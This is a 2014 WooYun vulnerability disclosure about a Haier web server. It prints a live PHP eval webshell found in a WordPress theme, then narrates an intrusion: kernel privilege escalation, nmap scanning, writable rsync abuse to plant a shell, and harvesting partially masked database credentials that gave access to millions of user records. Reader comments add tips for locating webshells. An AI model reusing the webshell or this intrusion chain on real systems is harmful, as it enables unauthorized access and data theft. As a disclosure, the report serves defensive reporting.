海尔某遗留问题导致可访问商城主库 | wooyun-2014-085777| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085777

漏洞标题：海尔某遗留问题导致可访问商城主库

漏洞作者： s0mun5

提交时间：2014-12-03 21:02

修复时间：2015-01-17 21:04

公开时间：2015-01-17 21:04

漏洞类型：内部绝密信息泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-03：细节已通知厂商并且等待厂商处理中
2014-12-04：厂商已经确认，细节仅向厂商公开
2014-12-14：细节向核心白帽子及相关领域专家公开
2014-12-24：细节向普通白帽子公开
2015-01-03：细节向实习白帽子公开
2015-01-17：细节向公众公开

简要描述：

海尔某遗留问题进入内网加之内网防护过于薄弱可导致商城用户、订单库泄露

详细说明：

http://zixun.ehaier.com/ 为wordpress搭建
对之前常见批量getshell特征匹配成功找到一个后门
http://zixun.ehaier.com/wp-content/themes/radius/404.php

后门创建时间为13-7-21

<?php @eval($_POST['pass']);?>

典型的php一句话
如果进行过查杀很容易发现

uname -a
Linux zixun-01.hst.ehaieridc.net 2.6.18-128.el5xen #1 SMP Wed Dec 17 12:01:40 EST 2008 x86_64 x86_64 x86_64 GNU/Linux

内核版本比较老可以直接进行提权

漏洞证明：

对网络基本结构进行分析

发现基本通信都是在10.9.10.1/24网段进行
本机已经安装了nmap，使用nmap对c段进行基本扫描
经过筛选发现 10.9.10.135 开启了rsync未授权访问

web访问 10.9.10.135 开启了 401认证
由于rsync可写下载.htpasswd 然后添加一个用户test:123456
登陆成功。
然后同步一个shell上去，成功getshell。

内核版本与上一台一样，同样可以提权，不再证明。
登陆时发现这web的功能是统计网站数据，包含用户、订单、访问等等
猜测有连接数据库的关键文件
查找配置文件，找到main_pro.php果然发现很多数据库配置

'db'=>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=10.9.10.61;dbname=db_mnt',
			'emulatePrepare' => true,
			'username' => 'imgfilter',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_mobile_mnt'=>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=db_mobile_mnt',
			'emulatePrepare' => true,
			'username' => 'report',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_analysis' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=ehaier_analysis_db',
			'emulatePrepare' => true,
			'username' => 'report',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => 'tbl_',
		),
		'data_analysis' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-cps-wrt.vip.ehaieridc.net;dbname=data_analysis',
			'emulatePrepare' => true,
			'username' => 'report',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_shop' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',
			'emulatePrepare' => true,
			'username' => 'pec',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_shopattributes' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=ShopAttributes',
			'emulatePrepare' => true,
			'username' => 'pec',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_stock' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-cbs-rnd.vip.ehaieridc.net;dbname=db_stock',
			'emulatePrepare' => true,
			'username' => 'cbs_stock_ro',
			'password' => '**********D)(]*********[zdF',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_eis' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-cbs-wrt.vip.ehaieridc.net;dbname=db_eis',
			'emulatePrepare' => true,
			'username' => 'cbs_eis_ser',
			'password' => 'cBs*{*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),
		'db_mobile' =>array(
			'class' => 'CDbConnection', 
			'connectionString' => 'mysql:host=my-shop-rnd.vip.ehaieridc.net;dbname=m_shop',
			'emulatePrepare' => true,
			'username' => 'm_shop_ro',
			'password' => '*********',
			'charset' => 'utf8',
			'tablePrefix' => '',
		),

连接'connectionString' => 'mysql:host=my-www-rnd.vip.ehaieridc.net;dbname=Shop',
的数据库

用户473w
为了验证是线上数据库我注册了一个账号在数据库中马上查到了

订单

黑客入侵内网无非就是想要这些已经没有必要继续深入

修复方案：

边界安全做好经常对服务器进行体检
内网安全一样要做好

版权声明：转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-12-04 16:11

厂商回复：

感谢s0mun5与乌云平台的测试与提醒，我方已安排人员进行处理。

漏洞评价：

2014-12-04 09:01 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

没人捧场吗？
2014-12-04 09:11 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

闪电在哪里？
2014-12-04 16:34 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

楼上你们2位，谁允许你们这么高rank 的！！！哼
2014-12-04 22:50 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

楼上的三位 ,谁允许你们这么高rank 的！！！哼
2014-12-04 23:55 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

楼上都是大牛
2014-12-05 11:02 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

楼上都是大牛
2015-01-17 21:28 | 李宇航的小柠檬 ( 路人 | Rank:5 漏洞数:1 | 小柠檬甜不甜)

我是大牛233333
2015-01-17 22:43 | 曙光的希望 ( 路人 | Rank:4 漏洞数:1 | 曙光的希望)

能不能给我个wordpress漏洞工具谢了。。。
2015-03-02 08:49 | 阿里阿里 ( 路人 | Rank:0 漏洞数:1 | 来打酱油的)

对之前常见批量getshell特征匹配,这个是怎么操作的啊？
2015-03-11 16:58 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

怎样用菜刀连上内网135机器的？
2015-03-12 09:13 | s0mun5 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

@luwikes 代理出来了
2015-03-12 09:14 | s0mun5 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

@阿里阿里 wp写shell 很多人写到主题的404里。用常用webshell密码post几个包就可以了。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085777

漏洞标题：海尔某遗留问题导致可访问商城主库

相关厂商：海尔集团

漏洞作者： s0mun5

提交时间：2014-12-03 21:02

修复时间：2015-01-17 21:04

公开时间：2015-01-17 21:04

漏洞类型：内部绝密信息泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085777

漏洞标题：海尔某遗留问题导致可访问商城主库

相关厂商：海尔集团

漏洞作者： s0mun5

提交时间：2014-12-03 21:02

修复时间：2015-01-17 21:04

公开时间：2015-01-17 21:04

漏洞类型：内部绝密信息泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085777"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：